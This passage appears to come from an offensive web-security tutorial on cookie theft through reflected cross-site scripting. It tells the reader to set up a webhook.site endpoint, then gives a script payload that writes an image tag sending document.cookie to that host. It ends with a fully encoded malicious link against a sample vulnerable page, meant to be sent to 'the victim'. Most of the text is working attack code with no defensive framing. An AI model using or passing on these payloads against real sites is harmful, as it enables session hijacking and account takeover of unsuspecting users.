We can leverage the following website so that we do not need our own webserver. https://webhook.site/
With a webhook in hand, we’re ready to craft our payload. Our payload should look like this. We’ll want to make sure we replace the URL with our generated webhook address.
A simple test can first be created with this:
<img src="[URL]/test.jpg" /> <script src="http://[URL]/test.js"></script>
<script>
document.write('<img src="[URL]?c='+document.cookie+'" />');
</script>
Once the browser renders the JavaScript the <img tag should look like the following and send the cookies to our website:
<img src="[URL]?c=[COOKIE]"/>
Before sending the link to the victim, make sure you encode the + symbols by replacing them with %2b
.
An example payload will look like the following:
http://vulnerable.webapp/index.php?name=<script>document.write('<img src="https://webhook.site/xxx-xxx-xxx/?c='%2bdocument.cookie%2b'" />');</script>